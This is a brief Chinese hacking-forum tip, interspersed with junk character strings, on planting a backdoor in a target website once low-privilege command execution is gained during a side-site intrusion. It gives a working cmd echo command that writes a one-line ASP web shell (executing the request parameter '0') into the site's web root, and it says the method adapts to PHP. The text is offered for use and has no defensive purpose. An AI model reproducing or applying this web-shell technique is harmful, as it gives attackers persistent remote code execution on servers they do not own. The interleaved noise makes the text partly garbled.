在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。/ z4 z, Z, Y' J9 |
/ B. ^9 K& W% ~
命令格式
; x2 T4 x9 c7 q
9 l0 @' a) a$ b+ HEcho 语句 >目标站绝对目录
/ P/ `1 F- S- B& S- L5 b; i* |0 S4 Z- X% r9 b/ u1 e
例如:
1 e# o6 C: L( |4 S6 o; r- {" n F) q; N5 o6 F" j# Z% P
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp- ?5 u( {3 X/ F( G
! w. _* L6 f# H4 q i这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
5 S! S$ G+ O4 r- l* e& \" e: d |